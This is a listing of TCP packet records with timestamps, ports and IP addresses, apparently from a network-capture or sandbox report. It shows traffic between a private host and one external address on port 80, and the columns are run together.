                                                                                Nov 29, 2024 01:52:43.374922037 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.374980927 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.374989986 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.375024080 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.375066042 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.375081062 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.375088930 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.375118971 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.375137091 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.375165939 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.375238895 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.375247955 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.375252008 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.375300884 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.494920969 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.494946957 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.495027065 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.495052099 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.495095015 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.495151043 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.541522980 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.541623116 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.657516003 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.658467054 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.705491066 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.705705881 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:43.821501017 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.921550035 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:43.923963070 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.169749975 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.169809103 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.172173977 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.172245026 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.284033060 CET804978972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.285726070 CET4978980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.285784960 CET4978980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.291446924 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.292184114 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.292200089 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.292299032 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.292309999 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.292388916 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.292423010 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.292459965 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.392807961 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.394450903 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.394491911 CET4979080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.395157099 CET4979180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.405827045 CET804978972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.514457941 CET804979072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.515050888 CET804979172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.515139103 CET4979180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.515260935 CET4979180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.548003912 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.635174036 CET804979172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.668026924 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.668873072 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.669003963 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.669038057 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.669097900 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.669125080 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.788974047 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789053917 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789064884 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789076090 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789112091 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789135933 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789150953 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789206028 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789208889 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789217949 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789238930 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789272070 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789272070 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789335012 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789376974 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789412975 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789460897 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789479971 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.789482117 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789500952 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.789522886 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.909245014 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.909255028 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.909310102 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.909352064 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.909360886 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.909403086 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:44.953507900 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:44.954478979 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.073537111 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.073645115 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.117522955 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.117598057 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.237514019 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.325596094 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.325668097 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.577593088 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.578135014 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.600456953 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.602440119 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.653364897 CET804979172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.654434919 CET4979180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.654484987 CET4979180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.698156118 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722619057 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722632885 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722709894 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722718954 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722801924 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722835064 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.722959995 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.769346952 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.774518967 CET804979172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.821227074 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.821294069 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.821372986 CET4979280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.889324903 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.889389992 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.889520884 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:45.941524029 CET804979272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:45.968530893 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.009412050 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.088577032 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.088663101 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.088804007 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.088917017 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.089009047 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.089025974 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.208978891 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209000111 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209008932 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209086895 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209110022 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209141016 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209156036 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209160089 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209165096 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209217072 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209264040 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209280014 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209311008 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209323883 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209387064 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209403038 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209434986 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209443092 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.209444046 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.209491014 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.329233885 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329252958 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329354048 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329397917 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.329397917 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.329416037 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.329454899 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.373712063 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.373795986 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.493550062 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.493635893 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.537601948 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.537673950 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.657550097 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.745611906 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.745656967 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:46.993654966 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:46.993707895 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.027318954 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.027380943 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.027419090 CET4979380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.043198109 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.043273926 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.113678932 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.144347906 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.147509098 CET804979372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163285017 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163295984 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163371086 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163403988 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163497925 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163506031 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.163589001 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.264324903 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.264401913 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.264528036 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.272908926 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.272963047 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.272984982 CET4979480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.384785891 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.392900944 CET804979472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.523617029 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643708944 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.643776894 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643878937 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643923044 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.643990040 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.644011021 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764162064 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764175892 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764185905 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764202118 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764209986 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764245987 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764254093 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764269114 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764309883 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764312983 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764341116 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764358997 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764388084 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764439106 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764447927 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764456034 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.764496088 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.764511108 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.884401083 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884416103 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884424925 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884429932 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.884488106 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.884519100 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:47.925566912 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:47.925688982 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.045567036 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.050472021 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.093575001 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.093908072 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.213680983 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.301539898 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.301609993 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.495009899 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.498486996 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.498586893 CET4979580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.549650908 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.550456047 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.561347008 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.562459946 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.613429070 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.618522882 CET804979572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.670423031 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682544947 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682590961 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682647943 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682676077 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682765961 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682816029 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.682920933 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.733382940 CET804979772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.733488083 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.733674049 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.781579971 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.781660080 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.781790972 CET4979680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:48.853552103 CET804979772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.901935101 CET804979672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:48.956073999 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076039076 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.076231956 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076442003 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076653004 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076750994 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.076837063 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196419001 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196716070 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196724892 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196732998 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196789980 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196814060 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196819067 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196822882 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196870089 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.196914911 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.196969032 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197035074 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.197052956 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197088003 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197094917 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.197097063 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197143078 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.197170019 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.197242975 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.316790104 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.316936016 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.316946983 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.317035913 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.317079067 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.318445921 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.357584953 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.357695103 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.477757931 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.478494883 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.521610022 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.641551018 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.642476082 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.847544909 CET804979872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.847634077 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.872634888 CET804979772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:49.872718096 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.879651070 CET4979780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.939614058 CET4979880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.994611979 CET4979980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:49.999505997 CET804979772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:50.114650965 CET804979972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:50.114736080 CET4979980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:50.401408911 CET4979980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:50.521311998 CET804979972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:50.765111923 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:50.885129929 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:50.885212898 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:50.885485888 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:50.885580063 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:50.885669947 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:50.885693073 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.005652905 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.005672932 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.005727053 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.005781889 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.005819082 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.005829096 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.005880117 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.005916119 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.005924940 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.005975008 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.006010056 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.006019115 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.006074905 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.006176949 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.006186008 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.006189108 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.006237984 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.126363039 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.126415014 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.126429081 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.126463890 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.126481056 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.126533031 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.126610041 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.126657009 CET4980080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:51.173552036 CET804980072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:51.173676968 CET4980080192.168.2.472.52.178.23
